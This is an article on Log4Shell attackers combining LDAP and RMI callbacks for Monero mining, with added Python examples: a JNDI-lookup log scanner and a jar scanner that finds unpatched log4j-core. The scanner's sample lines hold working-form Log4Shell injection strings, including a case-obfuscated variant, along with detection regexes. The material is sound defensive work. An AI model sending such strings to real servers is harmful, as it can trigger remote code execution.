To improve their odds of success, some threat actors exploiting the Apache Log4j vulnerability have shifted from LDAP callback URLs to RMI, or have even combined the two in a single request. This shift in the ongoing attacks is something defenders should be aware of when securing all possible callback channels. For the time being, the pattern has been observed among threat actors hijacking resources for Monero mining, but others might follow suit at any time.
The LDAP (Lightweight Directory Access Protocol) service has been used in most attacks targeting the Log4j “Log4Shell” vulnerability. Switching to the RMI (Remote Method Invocation) API may appear counterintuitive at first, given that this approach is subject to extra checks and limitations. However, this isn’t always the case.
Because some JVM (Java Virtual Machine) versions do not enforce strict rules on RMI, it can be a more convenient route to RCE (Remote Code Execution) than LDAP. Furthermore, LDAP queries are now firmly established as part of the infection chain, so defenders monitor them more closely.
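The detection side of this shift, as an added example that is not from the article or from Juniper Labs: a small Python scanner run over constructed access-log lines. It classifies each JNDI lookup by the callback scheme it names, flags requests that combine LDAP and RMI, and first collapses the case-changing or default-value nested lookups that would hide the token from a literal `jndi:` match. The log lines and the `callback.invalid` hostnames are constructed for the example.

```python
import re

# Constructed sample access-log lines (not taken from the article or any real incident).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${jndi:ldap://callback.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${jndi:rmi://callback.invalid/b}"',
    # Both schemes in one request, the combination the article describes.
    '10.0.0.9 - - "GET /?q=${jndi:ldap://callback.invalid/a} HTTP/1.1" 200 512 "${jndi:rmi://callback.invalid/b}"',
    # The jndi token assembled from nested lookups; a literal "jndi:" match misses it.
    '10.0.0.9 - - "GET / HTTP/1.1" 200 512 "${${lower:j}ndi:${lower:l}dap://callback.invalid/c}"',
]

# Nested lookups that only change case or supply a default value resolve to a
# literal string; collapse them before matching.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse case/default nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def jndi_schemes(line):
    """Sorted, de-duplicated list of JNDI URL schemes found in one log line."""
    return sorted({m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalize(line))})


def scan(lines):
    """Return (line_number, schemes, combined) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = jndi_schemes(line)
        if schemes:
            hits.append((number, schemes, len(schemes) > 1))
    return hits


if __name__ == "__main__":
    for number, schemes, combined in scan(SAMPLE_LOG_LINES):
        flag = " (multiple schemes in one request)" if combined else ""
        print(f"line {number}: jndi lookup via {', '.join(schemes)}{flag}")
```

Run as a script it reports lines 2 to 5, marking line 4 as a combined LDAP-plus-RMI request. The normalisation step is what keeps a monitoring rule written for `ldap://` from going blind when the same lookup arrives with its letters wrapped in `${lower:...}`; the scheme list, rather than a single boolean, is what lets a defender notice the LDAP-to-RMI shift the article describes.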
In attacks witnessed by Juniper Labs, threat actors are interested in mining Monero on hacked servers. They portray it as a relatively harmless activity that causes no harm to others. The miner is built for x86_64 Linux systems and uses the cron subsystem for persistence. Although most attacks have so far targeted Linux systems, Check Point claims to have uncovered the first Win32 program that uses Log4Shell, known as ‘StealthLoader.’
The only way to protect yourself from one of the most severe vulnerabilities in recent memory is to update Log4j to version 2.16.0. Admins should also watch Apache’s security section for new version announcements and apply them as soon as possible. Check out CISA’s detailed page on Log4Shell for mitigation advice and extensive technical resources.
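One way to act on this advice across a fleet, as an added example rather than anything from the article, CISA or Apache: a Python inventory check that walks a directory tree, opens every jar, identifies log4j-core by its manifest rather than its filename, and reports any copy below 2.16.0. It also records whether the `JndiLookup` class is still present, since removing that class was a documented interim mitigation for older versions; here that is only recorded, and the verdict still follows the article's advice to update. The manifest attributes used to recognise log4j-core (`Bundle-SymbolicName` of `org.apache.logging.log4j.core`, `Implementation-Title` of "Apache Log4j Core") are assumptions about the artifact's packaging, and the jars in the sample tree are constructed in a temporary directory.

```python
import os
import re
import shutil
import tempfile
import zipfile

PATCHED_VERSION = (2, 16, 0)  # the version the article says to update to
# Manifest attributes that identify the log4j-core artifact (an assumption
# about the artifact's packaging, not something the article states).
LOG4J_CORE_BUNDLE = "org.apache.logging.log4j.core"
# Class whose removal Apache documented as an interim mitigation for old versions.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); missing components are padded with zeros."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def read_manifest(jar):
    """META-INF/MANIFEST.MF as a dict (single-line attributes only)."""
    try:
        raw = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return {}
    attrs = {}
    for line in raw.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            attrs[key.strip()] = value.strip()
    return attrs


def inspect_jar(path):
    """Finding dict for a log4j-core jar, None for any other jar."""
    try:
        with zipfile.ZipFile(path) as jar:
            attrs = read_manifest(jar)
            title = attrs.get("Implementation-Title", "").lower()
            bundle = attrs.get("Bundle-SymbolicName", "")
            if LOG4J_CORE_BUNDLE not in bundle and "log4j core" not in title:
                return None
            version = parse_version(attrs.get("Implementation-Version", "0"))
            has_jndi = JNDI_LOOKUP_CLASS in jar.namelist()
    except zipfile.BadZipFile:
        return None
    return {
        "path": path,
        "version": ".".join(map(str, version)),
        "has_jndi_lookup": has_jndi,
        "needs_update": version < PATCHED_VERSION,
    }


def scan_tree(root):
    """Inspect every *.jar under root; findings carry root-relative paths."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jar"):
                continue
            full = os.path.join(dirpath, name)
            finding = inspect_jar(full)
            if finding:
                finding["path"] = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


def _write_jar(path, title, bundle, version, with_jndi_class):
    """Constructed jar: a manifest plus an optional empty class-file stub."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    manifest = "\r\n".join([
        "Manifest-Version: 1.0",
        f"Implementation-Title: {title}",
        f"Implementation-Version: {version}",
        f"Bundle-SymbolicName: {bundle}",
    ]) + "\r\n"
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", manifest)
        if with_jndi_class:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")  # placeholder, not real bytecode


def build_sample_tree(root):
    """Constructed inventory: two log4j-core versions, a renamed copy, one unrelated jar."""
    core = ("Apache Log4j Core", LOG4J_CORE_BUNDLE)
    _write_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), *core, "2.14.1", True)
    _write_jar(os.path.join(root, "lib", "log4j-core-2.16.0.jar"), *core, "2.16.0", True)
    # Renamed and with JndiLookup.class stripped: only the manifest reveals log4j-core,
    # and the interim mitigation does not change the verdict that it needs updating.
    _write_jar(os.path.join(root, "vendor", "app-bundled.jar"), *core, "2.12.1", False)
    _write_jar(os.path.join(root, "lib", "commons-text-1.9.jar"),
               "Apache Commons Text", "org.apache.commons.text", "1.9", False)


def demo():
    """Build the sample tree in a temp dir, scan it, clean up, return the findings."""
    root = tempfile.mkdtemp()
    try:
        build_sample_tree(root)
        return scan_tree(root)
    finally:
        shutil.rmtree(root)
```

Calling `demo()` returns three findings: the 2.14.1 and 2.12.1 copies flagged `needs_update`, the 2.16.0 copy not. Reading the manifest rather than trusting the filename is the point of the renamed `vendor/app-bundled.jar`: vendor-bundled copies are exactly the ones a filename-based search misses, which is why the vendor advisory list the article points to matters alongside a local scan. On a real host, point `scan_tree` at the application and container image roots rather than at the constructed sample.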
CVE-2021-44228 affects a wide range of products, and a continually updated list of vendor-supplied advisories is maintained in this GitHub repository. Finally, if you see strange activity on your systems, contact the FBI or CISA.